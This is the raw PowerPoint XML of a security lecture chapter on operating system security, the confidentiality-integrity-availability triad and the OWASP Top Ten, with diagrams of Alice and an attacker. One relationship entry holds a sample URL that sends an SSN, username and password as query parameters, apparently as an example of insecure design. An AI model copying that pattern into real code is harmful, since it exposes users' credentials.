      <a:lvl1pPr algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="80000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:buNone/>
        <a:defRPr sz="3600" kern="1200" cap="all" spc="100" baseline="0">
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:lumMod val="95000"/>
              <a:lumOff val="5000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:latin typeface="+mj-lt"/>
          <a:ea typeface="+mj-ea"/>
          <a:cs typeface="+mj-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="400050" indent="-40005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3200" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
      <a:lvl2pPr marL="627063" indent="-227013"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2pPr>
      <a:lvl3pPr marL="801688" indent="-174625" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="200"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="400"/>
        </a:spcAft>
        <a:buClr>
          <a:schemeClr val="accent1"/>
        </a:buClr>
        <a:buFont typeface="Wingdings 3" pitchFamily="18" charset="2"/>
        <a:buChar char=""/>
        <a:defRPr sz="2000" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr marL="976313" indent="-174625" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="200"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="400"/>
        </a:spcAft>
        <a:buClr>
          <a:schemeClr val="accent1"/>
        </a:buClr>
        <a:buFont typeface="Wingdings 3" pitchFamily="18" charset="2"/>
        <a:buChar char=""/>
        <a:defRPr sz="2000" kern="1200">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="1139825" indent="-163513" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:lnSpc>
          <a:spcPct val="90000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="200"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="400"/>
        </a:spcAft>
        <a:buClr>
          <a:schemeClr val="accent1"/>
        </a:buClr>
        <a:buFont typeface="Wingdings 3" pitchFamily="18" charset="2"/>
        <a:buChar char=""/>
        <a:defRPr sz="20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8.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramColors" Target="../diagrams/colors1.xml"/><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hyperlink" Target="http://www.owasp.org/index.php/Top_10" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramData" Target="../diagrams/data1.xml"/><Relationship Id="rId9"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hyperlink" Target="http://www.crn.com/security/207401353"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youtube.com/watch?v=pAS7kCgjkEw" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Client-side_script" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://en.wikipedia.org/wiki/Code_injection"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nacs.uci.edu/help/webauth/index.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.uci.edu/getdata.jsp?ssn=333224444&amp;ucinetid=johnsmith&amp;password=blah" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://apps.adcom.uci.edu/expresso/sams/Login.do?state=processLogi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we.mitre.org/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cve.mitre.org/"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en.wikipedia.org/wiki/Computer_system" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Computer_security" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Hacker_(computer_security)" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Hacker_(computing)#Black_Hat_Hacker" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://en.wikipedia.org/wiki/Computer_network"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Chapter 12 – Advanced topics</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Anh Nguyen-Duc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tho Quan-Thanh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419600" y="1976438"/>
            <a:ext cx="3276600" cy="3910012"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:lumMod val="90000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="lg" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15363" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4419600" y="2590800"/>
            <a:ext cx="533400" cy="3295650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="6699FF"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="15364" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5715000" y="2514600"/>
            <a:ext cx="1981200" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CC3300"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="15365" name="Picture 4" descr="http://indarktrees.com/pics/villian%2520copy.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="14191" t="2339" r="11314" b="20322"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8686800" y="1905000"/>
            <a:ext cx="1703388"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8" descr="Alice _8885 by Disney-Grandpa."/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="7903" t="10526" r="9120" b="7895"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1752600" y="3886200"/>
            <a:ext cx="160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TextBox 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8229601" y="4286250"/>
            <a:ext cx="22764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lgn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO"/>
              <a:t>OS Attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="nb-NO"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO"/>
              <a:t>Controls malicious files and applications</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15368" name="TextBox 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2057400" y="6267450"/>
            <a:ext cx="71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nb-NO"/>
              <a:t>Alice</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15369" name="Right Arrow 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3581400" y="4343400"/>
            <a:ext cx="685800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="6699FF"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="15370" name="Right Arrow 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="3581400" y="5257800"/>
            <a:ext cx="685800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="6699FF"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="15371" name="Right Arrow 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7848600" y="2362200"/>
            <a:ext cx="685800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CC3300"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="15372" name="Right Arrow 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="7848600" y="3276600"/>
            <a:ext cx="685800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CC3300"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Title 15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2133600" y="304800"/>
            <a:ext cx="7772400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" kern="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Operating system security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15374" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4419600" y="2514600"/>
            <a:ext cx="1066800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="6699FF"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="15375" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7162800" y="2514600"/>
            <a:ext cx="533400" cy="1066800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CC3300"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="15376" name="Picture 5" descr="http://stats.macewan.ca/learn/students/tutorial/glossary/images/OPER-SYS.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1" y="2395539"/>
            <a:ext cx="3514725"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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83D6A4E6-4E24-C86C-639E-35752E296EDF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{99CDA570-3726-4076-A52A-5F8551B159D3}" type="datetime1">
              <a:rPr lang="nb-NO" smtClean="0"/>
              <a:t>23.08.2023</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E41C1DF0-3CC5-C3A3-C5D0-3DC16CDBBDE9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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60912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029200" y="661988"/>
            <a:ext cx="2209800" cy="2286000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:lumMod val="90000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="lg" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>System</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16387" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4495800" y="666750"/>
            <a:ext cx="533400" cy="2286000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="6699FF"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="16388" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7239000" y="666750"/>
            <a:ext cx="533400" cy="2286000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CC3300"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="16389" name="Picture 4" descr="http://indarktrees.com/pics/villian%2520copy.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="14191" t="2339" r="11314" b="20322"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8763000" y="590550"/>
            <a:ext cx="1703388"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8" descr="Alice _8885 by Disney-Grandpa."/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="7903" t="10526" r="9120" b="7895"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1828800" y="590550"/>
            <a:ext cx="160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Box 11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9194801" y="3257550"/>
            <a:ext cx="1116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nb-NO"/>
              <a:t>Attacker</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16392" name="TextBox 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2133600" y="3257550"/>
            <a:ext cx="71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nb-NO"/>
              <a:t>Alice</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16393" name="Right Arrow 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3657600" y="1047750"/>
            <a:ext cx="685800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="6699FF"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="16394" name="Right Arrow 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="3657600" y="1962150"/>
            <a:ext cx="685800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="6699FF"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="16395" name="Right Arrow 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7924800" y="1047750"/>
            <a:ext cx="685800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CC3300"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="16396" name="Right Arrow 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="7924800" y="1962150"/>
            <a:ext cx="685800" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CC3300"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1720312" y="4095750"/>
            <a:ext cx="9252488" cy="1352550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="hlink"/>
              </a:buClr>
              <a:buSzPct val="110000"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Confidentiality: Attacker does not learn Alice’s secrets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="hlink"/>
              </a:buClr>
              <a:buSzPct val="110000"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Integrity: Attacker does not undetectably corrupt system’s function for Alice</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="hlink"/>
              </a:buClr>
              <a:buSzPct val="110000"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" kern="0" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Availability: Attacker does not keep system from being useful to Alice</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Date Placeholder 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FF188FE-D4E4-21B6-46FB-710179DE2B40}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{B648F5A5-5C3D-44D4-84B0-BEA7441C8F7C}" type="datetime1">
              <a:rPr lang="nb-NO" smtClean="0"/>
              <a:t>23.08.2023</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Footer Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADF64B46-BA0B-FF6F-078A-20D9960E050D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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009015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p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="nb-NO" dirty="0"/>
              <a:t>OWASP Top Ten LIST</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="10" name="Content Placeholder 3"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1752600" y="1556792"/>
          <a:ext cx="8915400" cy="38625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Picture 10" descr="owasp-logo"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId9" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1666844" y="5229200"/>
            <a:ext cx="3781084" cy="909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7653" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5346701" y="5445126"/>
            <a:ext cx="4564063" cy="307975"/>
          </a:xfrm>
